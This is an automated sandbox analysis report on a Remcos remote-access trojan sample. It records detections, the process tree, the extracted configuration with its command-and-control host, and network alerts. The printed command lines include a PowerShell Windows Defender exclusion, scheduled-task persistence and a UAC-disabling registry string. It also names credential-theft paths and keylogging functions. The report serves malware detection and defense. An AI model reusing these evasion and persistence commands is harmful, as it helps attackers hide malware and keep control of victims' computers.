
Windows Analysis Report
vQyKfYxzXB.exe

Overview

General Information

Sample name: vQyKfYxzXB.exe (renamed because original name is a hash value)
Original sample name: 0d0cc505a458e4983da79246c321dfda6edc4d9b1f14e902ac13788a27c53afa.exe
Analysis ID: 1587729
MD5: a5e057f72b814ddcc71246b8dd092e2a
SHA1: 155810faddf2f068fe49735bbd6a3a13a60c75c3
SHA256: 0d0cc505a458e4983da79246c321dfda6edc4d9b1f14e902ac13788a27c53afa
Tags: exe, RemcosRAT, user-adrian__luca

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • vQyKfYxzXB.exe (PID: 7548 cmdline: "C:\Users\user\Desktop\vQyKfYxzXB.exe" MD5: A5E057F72B814DDCC71246B8DD092E2A)
    • powershell.exe (PID: 7776 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8088 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7800 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp8902.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vQyKfYxzXB.exe (PID: 7888 cmdline: "C:\Users\user\Desktop\vQyKfYxzXB.exe" MD5: A5E057F72B814DDCC71246B8DD092E2A)
    • vQyKfYxzXB.exe (PID: 7908 cmdline: "C:\Users\user\Desktop\vQyKfYxzXB.exe" MD5: A5E057F72B814DDCC71246B8DD092E2A)
    • vQyKfYxzXB.exe (PID: 7932 cmdline: "C:\Users\user\Desktop\vQyKfYxzXB.exe" MD5: A5E057F72B814DDCC71246B8DD092E2A)
  • RTdozXra.exe (PID: 8036 cmdline: C:\Users\user\AppData\Roaming\RTdozXra.exe MD5: A5E057F72B814DDCC71246B8DD092E2A)
    • schtasks.exe (PID: 5296 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp9C1D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RTdozXra.exe (PID: 2140 cmdline: "C:\Users\user\AppData\Roaming\RTdozXra.exe" MD5: A5E057F72B814DDCC71246B8DD092E2A)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["decmainserver.webredirect.org:45682:1"], "Assigned name": "hdyebf", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "46875-RPQWNM", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}
Source | Rule | Description | Author | Strings
00000000.00000002.1316899514.00000000042E1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000000.00000002.1316899514.00000000042E1000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x344e8:$a1: Remcos restarted by watchdog!
  • 0x34a40:$a3: %02i:%02i:%02i:%03i
  • 0x34dc5:$a4: * Remcos v
0000000F.00000002.1364291273.0000000001167000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000A.00000002.3751309222.0000000001757000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
Source | Rule | Description | Author | Strings
0.2.vQyKfYxzXB.exe.43e7e20.3.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0.2.vQyKfYxzXB.exe.43e7e20.3.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x661e0:$a1: Remcos restarted by watchdog!
  • 0x66738:$a3: %02i:%02i:%02i:%03i
  • 0x66abd:$a4: * Remcos v
0.2.vQyKfYxzXB.exe.43e7e20.3.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x611e4:$str_a1: C:\Windows\System32\cmd.exe
  • 0x61160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x61160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x60610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x60e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6020c:$str_b2: Executing file:
  • 0x61328:$str_b3: GetDirectListeningPort
  • 0x60c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x60e30:$str_b7: \update.vbs
  • 0x60234:$str_b9: Downloaded file:
  • 0x60220:$str_b10: Downloading file:
  • 0x602c4:$str_b12: Failed to upload file:
  • 0x612f0:$str_b13: StartForward
  • 0x61310:$str_b14: StopForward
  • 0x60dd8:$str_b15: fso.DeleteFile "
  • 0x60d6c:$str_b16: On Error Resume Next
  • 0x60e08:$str_b17: fso.DeleteFolder "
  • 0x602b4:$str_b18: Uploaded file:
  • 0x60274:$str_b19: Unable to delete:
  • 0x60da0:$str_b20: while fso.FileExists("
  • 0x60749:$str_c0: [Firefox StoredLogins not found]
0.2.vQyKfYxzXB.exe.43e7e20.3.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer | detects Windows executables potentially bypassing UAC using eventvwr.exe | ditekSHen
  • 0x60100:$s1: \Classes\mscfile\shell\open\command
  • 0x60160:$s1: \Classes\mscfile\shell\open\command
  • 0x60148:$s2: eventvwr.exe
0.2.vQyKfYxzXB.exe.455aa60.2.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

              System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vQyKfYxzXB.exe", ParentImage: C:\Users\user\Desktop\vQyKfYxzXB.exe, ParentProcessId: 7548, ParentProcessName: vQyKfYxzXB.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe", ProcessId: 7776, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vQyKfYxzXB.exe", ParentImage: C:\Users\user\Desktop\vQyKfYxzXB.exe, ParentProcessId: 7548, ParentProcessName: vQyKfYxzXB.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe", ProcessId: 7776, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp9C1D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp9C1D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\RTdozXra.exe, ParentImage: C:\Users\user\AppData\Roaming\RTdozXra.exe, ParentProcessId: 8036, ParentProcessName: RTdozXra.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp9C1D.tmp", ProcessId: 5296, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp8902.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp8902.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\vQyKfYxzXB.exe", ParentImage: C:\Users\user\Desktop\vQyKfYxzXB.exe, ParentProcessId: 7548, ParentProcessName: vQyKfYxzXB.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp8902.tmp", ProcessId: 7800, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vQyKfYxzXB.exe", ParentImage: C:\Users\user\Desktop\vQyKfYxzXB.exe, ParentProcessId: 7548, ParentProcessName: vQyKfYxzXB.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe", ProcessId: 7776, ProcessName: powershell.exe

              Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp8902.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp8902.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\vQyKfYxzXB.exe", ParentImage: C:\Users\user\Desktop\vQyKfYxzXB.exe, ParentProcessId: 7548, ParentProcessName: vQyKfYxzXB.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp8902.tmp", ProcessId: 7800, ProcessName: schtasks.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T17:30:30.199994+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49702 | 69.174.98.48 | 45682 | TCP
2025-01-10T17:30:52.640096+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49820 | 69.174.98.48 | 45682 | TCP
2025-01-10T17:31:15.030732+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49955 | 69.174.98.48 | 45682 | TCP
2025-01-10T17:31:37.422868+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49978 | 69.174.98.48 | 45682 | TCP
2025-01-10T17:31:59.830523+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49979 | 69.174.98.48 | 45682 | TCP
2025-01-10T17:32:22.205879+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49980 | 69.174.98.48 | 45682 | TCP
2025-01-10T17:32:44.862851+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49981 | 69.174.98.48 | 45682 | TCP
2025-01-10T17:33:07.360992+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49982 | 69.174.98.48 | 45682 | TCP
2025-01-10T17:33:29.740356+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49983 | 69.174.98.48 | 45682 | TCP
2025-01-10T17:33:52.157024+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49984 | 69.174.98.48 | 45682 | TCP
2025-01-10T17:34:14.597081+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49985 | 69.174.98.48 | 45682 | TCP

              AV Detection

Source: vQyKfYxzXB.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Avira: detection malicious, Label: HEUR/AGEN.1306877
Source: 0000000A.00000002.3751309222.0000000001757000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["decmainserver.webredirect.org:45682:1"], "Assigned name": "hdyebf", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "46875-RPQWNM", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | ReversingLabs: Detection: 71%
Source: vQyKfYxzXB.exe | ReversingLabs: Detection: 71%
Source: Yara match | File source: 0.2.vQyKfYxzXB.exe.43e7e20.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vQyKfYxzXB.exe.455aa60.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RTdozXra.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RTdozXra.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vQyKfYxzXB.exe.455aa60.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vQyKfYxzXB.exe.44a1440.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vQyKfYxzXB.exe.43e7e20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1316899514.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1364291273.0000000001167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3751309222.0000000001757000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1316899514.0000000004322000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vQyKfYxzXB.exe PID: 7548, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: vQyKfYxzXB.exe PID: 7932, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RTdozXra.exe PID: 2140, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Joe Sandbox ML: detected
Source: vQyKfYxzXB.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 15_2_004315EC
Source: vQyKfYxzXB.exe, 00000000.00000002.1316899514.0000000004322000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_a7466245-f
Source: vQyKfYxzXB.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: vQyKfYxzXB.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: Zfva.pdbSHA256 source: vQyKfYxzXB.exe, RTdozXra.exe.0.dr
Source: Binary string: Zfva.pdb source: vQyKfYxzXB.exe, RTdozXra.exe.0.dr
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 15_2_0041A01B
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 15_2_0040B28E
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 15_2_0040838E
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 15_2_004087A0
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 15_2_00407848
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_004068CD FindFirstFileW,FindNextFileW, 15_2_004068CD
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_0044BA59 FindFirstFileExA, 15_2_0044BA59
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 15_2_0040AA71
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW, 15_2_00417AAB
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 15_2_0040AC78
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 15_2_00406D28

              Networking

Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49702 -> 69.174.98.48:45682
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49820 -> 69.174.98.48:45682
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49979 -> 69.174.98.48:45682
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49982 -> 69.174.98.48:45682
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49981 -> 69.174.98.48:45682
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49984 -> 69.174.98.48:45682
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49978 -> 69.174.98.48:45682
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49983 -> 69.174.98.48:45682
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49985 -> 69.174.98.48:45682
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49955 -> 69.174.98.48:45682
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49980 -> 69.174.98.48:45682
Source: Malware configuration extractor | URLs: decmainserver.webredirect.org
Source: global traffic | TCP traffic: 69.174.98.48 ports 2,4,5,6,8,45682
Source: global traffic | TCP traffic: 192.168.2.7:49702 -> 69.174.98.48:45682
Source: Joe Sandbox View | ASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_0041936B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 15_2_0041936B
Source: global traffic | DNS traffic detected: DNS query: decmainserver.webredirect.org
Source: RTdozXra.exe | String found in binary or memory: http://geoplugin.net/json.gp
Source: vQyKfYxzXB.exe, 00000000.00000002.1316899514.0000000004322000.00000004.00000800.00020000.00000000.sdmp, vQyKfYxzXB.exe, 00000000.00000002.1316899514.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, RTdozXra.exe, 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
Source: vQyKfYxzXB.exe, 00000000.00000002.1314848353.00000000033A2000.00000004.00000800.00020000.00000000.sdmp, RTdozXra.exe, 0000000B.00000002.1379421623.0000000003101000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

              Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_00409340 SetWindowsHookExA 0000000D,0040932C,00000000 15_2_00409340
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard, 15_2_0040A65A
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 15_2_00414EC1
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard, 15_2_0040A65A
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx, 15_2_00409468

              E-Banking Fraud

Source: Yara match | File source: 0.2.vQyKfYxzXB.exe.43e7e20.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vQyKfYxzXB.exe.455aa60.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RTdozXra.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RTdozXra.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vQyKfYxzXB.exe.455aa60.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vQyKfYxzXB.exe.44a1440.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vQyKfYxzXB.exe.43e7e20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1316899514.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1364291273.0000000001167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3751309222.0000000001757000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
